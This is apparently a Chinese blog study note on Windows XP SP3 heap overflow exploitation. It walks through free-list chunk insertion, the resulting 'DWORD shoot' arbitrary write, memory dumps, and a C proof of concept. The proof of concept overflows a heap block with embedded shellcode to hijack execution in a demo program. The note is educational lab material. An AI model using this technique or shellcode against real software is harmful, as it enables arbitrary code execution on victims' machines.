zoukankan      html  css  js  c++  java
  • 利用chunk重设大小攻击堆

    只是笔记························································

    堆块学习···

    DWORD SHOOT

    下面环境为  XP   sp3 VC6.0  RELEASE

    #include <windows.h>
    
    int main()  
    {  
        HLOCAL h1 = 0, h2 = 0;  
        HANDLE hp;  
        hp = HeapCreate(0,0x1000,0x10000);  
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,0x10);  
    
        return 0;  
    }  


    xp 下面介绍 CHUNK插入链表的过程:

    执行完 HeapCreate 后  



    开始拆卸链表:


    接着开始关键部分:





    到这里  新chunk的插入部分的关键部分也就结束了··············




    总结:

    [新chunk->flink]  = 旧chunk->flink

    [新chunk->blink] = 旧chunk->blink

     [ 旧chunk->blink->flink ] = 新chunk

    [旧chunk->blink] = 新chunk


     实际上是造成了一个向任意地址写入固定值得 漏洞 dword shoot

    下面是正常情况反映················································

    003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A0698  2D 01 03 00 00 10 00 00 78 01 3A 00 78 01 3A 00  -....x:.x:.
    003A06A8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06B8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

    003A0688  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A0698  03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00  ..?.........
    003A06A8  00 00 00 00 00 00 00 00 2A 01 03 00 00 10 00 00  ........*....
    003A06B8  78 01 3A 00 78 01 3A 00 00 00 00 00 00 00 00 00  x:.x:.........
    003A06C8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06D8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
    003A06E8  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

    在这里构造:在第二次分配之前!!!!
    [0x003a06b8]      =   0x003a06eb

    [0x003a0638+4]  =   0x0012ffe4

    [0x0012ffe4]        =  0x003a06b8

    [0x003a06eb+4]  =   0x003906b8

    003A0688  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A0698  10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00  .櫃櫃?:.?:.
    003A06A8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A06B8  90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90  悙悙悙悙?悙悙悙
    003A06C8  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  悙悙悙悙悙悙悙悙
    003A06D8  90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99  悙悙悙悙悙?.
    003A06E8  99 99 99 8C 06 3A 00 E4 FF 12 00



    003A06B8   /EB 06           jmp X003A06C0
    003A06BA   |3A00            cmp al,byte ptr ds:[eax]
    003A06BC   |E4 FF           in al,0xFF
    003A06BE   |1200            adc al,byte ptr ds:[eax]
    003A06C0   EB 31           jmp X003A06F3             //而这个的EB 31 是我们故意设置的跳转
    

    #include <stdio.h>
    #include <windows.h>
    
    	char shellcode[]=
    		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    		"x10x01x10x00x99x99x99x99"
    
    		"xEBx06x3ax00xEBx06x3ax00"
    
    		"x90x90x90x90x90x90x90x90"
    		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    		"xEBx31x90x90x90x90x90x90"
    		"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    		"x90x90x90x90x90x90x90x90x90x90x90"
    
    		"x11x01x10x00x99x99x99x99x8Cx06x3ax00xb4xFFx12x00"
    		"x90x90x90x90"
    
    		"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    		"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    		"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    		"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    		"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    		"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    		"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    		"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    		"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    		"x53"
    		"x68x64x61x30x23"
    		"x68x23x50x61x6E"
    		"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";
    void main()
    {	
    	HLOCAL h1,h2;
    	HANDLE hp;
    	hp = HeapCreate(0,0x1000,0x10000);
    //	__asm int 3
    		h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    	memcpy(h1,shellcode,300);
    	h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    	int zero=0;
    	zero=1/zero;
    	printf("%d",zero);
    }










  • 相关阅读:
    《金字塔原理》听书笔记
    凡事有交代
    关于马云不用淘宝不用支付宝的想法
    jenkins如何在一台机器上开启多个slave
    jenkins结合docker
    flask-assets使用介绍
    touch: cannot touch ‘/var/jenkins_home/copy_reference_file.log’: Permission denied Can not write to /var/jenkins_home/copy_reference_file.log. Wrong volume permissions?
    JS中event.preventDefault()取消默认事件能否还原?
    flask前端优化:css/js/html压缩
    What's New In DevTools (Chrome 59)来看看最新Chrome 59的开发者工具又有哪些新功能
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982381.html
Copyright © 2011-2022 走看看